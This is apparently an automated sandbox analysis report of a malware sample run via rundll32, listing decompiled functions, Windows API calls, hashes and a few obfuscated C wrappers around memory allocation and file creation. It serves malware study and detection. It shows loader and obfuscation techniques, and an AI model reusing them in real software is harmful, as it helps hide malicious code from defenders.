API String ID: 4116985748-120404372
Opcode ID: ba3f83eed2097258f4b55b7689371b550dea0260d70d705feacb8dabff6a4ae6
Instruction ID: 7f7f85419d5be79e7edd662bd930769ea64122f724e47c3b17cd328e64ad2787
Opcode Fuzzy Hash: ba3f83eed2097258f4b55b7689371b550dea0260d70d705feacb8dabff6a4ae6
Instruction Fuzzy Hash: 11018B352103169FD7148F04FC8DB57F799EB42391F048062EC89CA283DA719C568BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00242B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00242B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00242BA9
DdeGetLastError.USER32(00000015), ref: 00242BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00242BCD

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 562da32ef65a99b23a358068ea80ef77c2cde4f94359094a9f458e43079c9680
Instruction ID: f513379248acdfb21916610ef448ad9b49a944a02a6a3dc348c99d6e7fc196f6
Opcode Fuzzy Hash: 562da32ef65a99b23a358068ea80ef77c2cde4f94359094a9f458e43079c9680
Instruction Fuzzy Hash: A02136742142409FDB44DF69C8C5F6AB7E8AB49710F188195FA88CF2A6D771EC80CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00241428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 002414BF

Strings

0$, xrefs: 00241607
`, xrefs: 00241498

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0$$`
API String ID: 701148680-2342568253
Opcode ID: f76534b7e082bcf4290d677023f6d10fc2b8758cb199ca128754d32e09a9d7e7
Instruction ID: 1cb127bbca436495a87f27d38c0781d6f02f50b00d7128b96a45f3960592cd79
Opcode Fuzzy Hash: f76534b7e082bcf4290d677023f6d10fc2b8758cb199ca128754d32e09a9d7e7
Instruction Fuzzy Hash: 79516076A2021A8BCB1CEF68D9855AE77BDEB48350F154020FD0ADB744CA30DDB58BA5

Uniqueness

Uniqueness Score: -1.00%

Function 002080E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00208110

Strings

GetSystemMetrics, xrefs: 002080F8
/}Au, xrefs: 002080FD, 0020810A, 00208110

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: fc4b1950b0361a21c9ff86d925a4ce0144bcf146a16d1538e6eafe584ff3eb98
Instruction ID: f89d1bda61cc01e9e39bab31e85b1815f4ef7d72a8bfaff12c25f877912274e7
Opcode Fuzzy Hash: fc4b1950b0361a21c9ff86d925a4ce0144bcf146a16d1538e6eafe584ff3eb98
Instruction Fuzzy Hash: C7F090705353424FDB148B34AD88727B68AAF53330F605A31E1AE462D7CE7988678659

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 3056 Parent PID: 1836 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	44%
Signature Coverage:	0%
Total number of Nodes:	25
Total number of Limit Nodes:	2

Executed Functions

Function 00463928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E

Strings

trty55345, xrefs: 004639BD
|lF, xrefs: 00463961

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|lF
API String ID: 2643768156-462011533
Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F

Uniqueness

Uniqueness Score: -1.00%

Function 00461638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686

Strings

Link, xrefs: 00461666

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
Instruction ID: d0869bd9eca08793bd1e582bf0eae279adb1ed532342e6143eed6f974ddeb4d0
Opcode Fuzzy Hash: 055aaab054cbac23bb404edc2ea0e6fc863d0eba1ab5203796eac30f3dd84bef
Instruction Fuzzy Hash: F21194706007006FD710EF76CD82B4E77E9AF45744B54583AF800E76A1FA79A901875E

Uniqueness

Uniqueness Score: -1.00%

Function 0020EB40, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0020EB8F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 0020EDD9

Memory Dump Source

Source File: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 277043798b2cc333e83b97f6ba02c79dfe202150811d7d09766008fb6e449af7
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 99C1B974A102099FCB48CF88C590EAEB7B5FF88304F158559E8199B392D735EE92CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00461A14, Relevance: 3.1, APIs: 2, Instructions: 56
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799

Uniqueness

Uniqueness Score: -1.00%

Function 0020E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020E6A4

Strings

VirtualAlloc, xrefs: 0020E689, 0020E68C

Memory Dump Source

Source File: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 0ab41041595deed4d8a9c6fec46115b54e56d3d6817f324601d3d00315daee03
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 87113060D08389DAEF01DBE894097FEBFB55B21704F044498D5446B282D2BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00428330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00428361
GetSystemMetrics.USER32(00000000), ref: 0042839D
GetSystemMetrics.USER32(00000001), ref: 004283A8

Strings

GetMonitorInfo, xrefs: 00428348
DISPLAY, xrefs: 004283C9
/}Au, xrefs: 0042839D, 004283A8

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004285AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
GetSystemMetrics.USER32(00000000), ref: 0042860A
GetSystemMetrics.USER32(00000001), ref: 00428615

Strings

EnumDisplayMonitors, xrefs: 004285C4
/}Au, xrefs: 0042860A, 00428615

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00428471
GetSystemMetrics.USER32(00000001), ref: 0042847C

Strings

DISPLAY, xrefs: 0042849D
GetMonitorInfoA, xrefs: 0042841C
/}Au, xrefs: 00428471, 0042847C

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA

Uniqueness

Uniqueness Score: -1.00%

Function 004284D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00428545
GetSystemMetrics.USER32(00000001), ref: 00428550

Strings

GetMonitorInfoW, xrefs: 004284F0
DISPLAY, xrefs: 00428571
/}Au, xrefs: 00428545, 00428550

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004282E6
GetSystemMetrics.USER32(00000001), ref: 004282F8

Strings

MonitorFromPoint, xrefs: 004282AA
/}Au, xrefs: 004282E6, 004282F8

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004281C1
GetSystemMetrics.USER32(00000001), ref: 004281CD

Strings

MonitorFromRect, xrefs: 00428185
/}Au, xrefs: 004281C1, 004281CD

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00462B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
DdeGetLastError.USER32(00000015), ref: 00462BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00461428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF

Strings

0F, xrefs: 00461607
`, xrefs: 00461498

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0F$`
API String ID: 701148680-3237207667
Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 004280E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00428110

Strings

GetSystemMetrics, xrefs: 004280F8
/}Au, xrefs: 004280FD, 0042810A, 00428110

Memory Dump Source

Source File: 0000000D.00000002.2343907962.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_423000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 3052 Parent PID: 3056 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	4.1%
Signature Coverage:	0%
Total number of Nodes:	268
Total number of Limit Nodes:	16

Executed Functions

Function 00213928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 002139C2
VirtualAlloc.KERNELBASE(00000000,00216CB4,00001000,00000040), ref: 00213A8E

Strings

|l!, xrefs: 00213961
trty55345, xrefs: 002139BD

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|l!
API String ID: 2643768156-3361687670
Opcode ID: 25b927cc27691b50de04d5d5799094ac47ff2e9d213b525014f0e9771b6ca76b
Instruction ID: b46c524988a9e063eb5aef6ea9a6278e8ac45a12c9b6026f272442416ca123a6
Opcode Fuzzy Hash: 25b927cc27691b50de04d5d5799094ac47ff2e9d213b525014f0e9771b6ca76b
Instruction Fuzzy Hash: 78617A706062059FD750DF28FD8EBCE77A6E738358B01C02AE18987261DF76A994CB84

Uniqueness

Uniqueness Score: -1.00%

Function 001C04C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001C04C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E001B7378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}

0x001c04cd
0x001c04d6
0x001c04dd
0x001c04e1
0x001c04e5
0x001c04ec
0x001c04f8
0x001c04fd
0x001c0502
0x001c0509
0x001c0510
0x001c0517
0x001c051f
0x001c0522
0x001c0529
0x001c0530
0x001c0537
0x001c0556
0x001c0560

APIs

ExitProcess.KERNEL32(00000000), ref: 001C0560

Strings

LZ, xrefs: 001C0529
*S, xrefs: 001C0522
5l, xrefs: 001C0502

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: *S$5l$LZ
API String ID: 621844428-1939029103
Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction ID: 4039af8a1800d3dba2e130a12f92975daf27b861002398b5de683fd79e17c609
Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction Fuzzy Hash: CE11F771E0520CEBEB04DFE4D84AADEBBB1EB50714F10C189E414A7294D7F96B548F41

Uniqueness

Uniqueness Score: -1.00%

Function 001B9B5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E001B9B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t52;
				void* _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				long _t81;

				_push(_a12);
				_t81 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001C2550(_t52);
				_v36 = 0x84647;
				asm("stosd");
				asm("stosd");
				_t70 = 0x14;
				asm("stosd");
				_v20 = 0xbd42;
				_t71 = 0x62;
				_v20 = _v20 / _t70;
				_v20 = _v20 ^ 0x00000265;
				_v16 = 0x7dd6;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x742f5ff0;
				_v16 = _v16 ^ 0x742f2524;
				_v12 = 0x61c8;
				_t72 = 0x48;
				_v12 = _v12 / _t72;
				_v12 = _v12 + 0xffff34fc;
				_v12 = _v12 ^ 0xffff6696;
				_v8 = 0xb2ad;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 * 0xd;
				_v8 = _v8 | 0x4443bccc;
				_v8 = _v8 ^ 0x475ff878;
				E001B7378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
				return _t68;
			}

0x001b9b66
0x001b9b69
0x001b9b6b
0x001b9b6e
0x001b9b71
0x001b9b73
0x001b9b78
0x001b9b87
0x001b9b8c
0x001b9b8d
0x001b9b90
0x001b9b91
0x001b9b9d
0x001b9b9e
0x001b9ba3
0x001b9baa
0x001b9bb8
0x001b9bbd
0x001b9bc4
0x001b9bcb
0x001b9bd5
0x001b9bdd
0x001b9be0
0x001b9be7
0x001b9bee
0x001b9c05
0x001b9c0c
0x001b9c0f
0x001b9c16
0x001b9c29
0x001b9c38
0x001b9c3f

APIs

RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 001B9C38

Strings

$%/t, xrefs: 001B9BC4

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: $%/t
API String ID: 1279760036-1978068534
Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
Instruction ID: 550dfada5c0f69c5376e1617a0e297c8e1dccee7f81f5ea055e02a6bcca7b6e2
Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
Instruction Fuzzy Hash: B1214671D00209BBEB18CFA9C9469DEBBB5FB44310F108099E814AA2A0D7B99B109B51

Uniqueness

Uniqueness Score: -1.00%

Function 001CC0C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E001CC0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t40;
				void* _t48;
				long _t52;
				long _t53;

				_t52 = __edx;
				_push(0);
				_push(_a36);
				_t53 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C2550(_t40);
				_v20 = 0xb477;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x000000e5;
				_v16 = 0xb312;
				_v16 = _v16 + 0x2a6f;
				_v16 = _v16 ^ 0x0000d90b;
				_v12 = 0x5a0b;
				_v12 = _v12 + 0x400b;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x09a119a3;
				_v8 = 0x3388;
				_v8 = _v8 + 0x85f8;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x00415e39;
				E001B7378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
				return _t48;
			}

0x001cc0d3
0x001cc0d5
0x001cc0d6
0x001cc0d9
0x001cc0db
0x001cc0de
0x001cc0df
0x001cc0e2
0x001cc0e5
0x001cc0e8
0x001cc0eb
0x001cc0ee
0x001cc0f1
0x001cc0f2
0x001cc0f3
0x001cc0f8
0x001cc102
0x001cc106
0x001cc10d
0x001cc114
0x001cc11b
0x001cc122
0x001cc129
0x001cc130
0x001cc134
0x001cc13b
0x001cc142
0x001cc15d
0x001cc160
0x001cc174
0x001cc189
0x001cc191

APIs

CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 001CC189

Strings

9^A, xrefs: 001CC160

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: 9^A
API String ID: 823142352-4044883665
Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
Instruction ID: 18e308e27623ca1a8287edde7cdb1b0fca934b0eb52c7dccd818757b3213aa00
Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
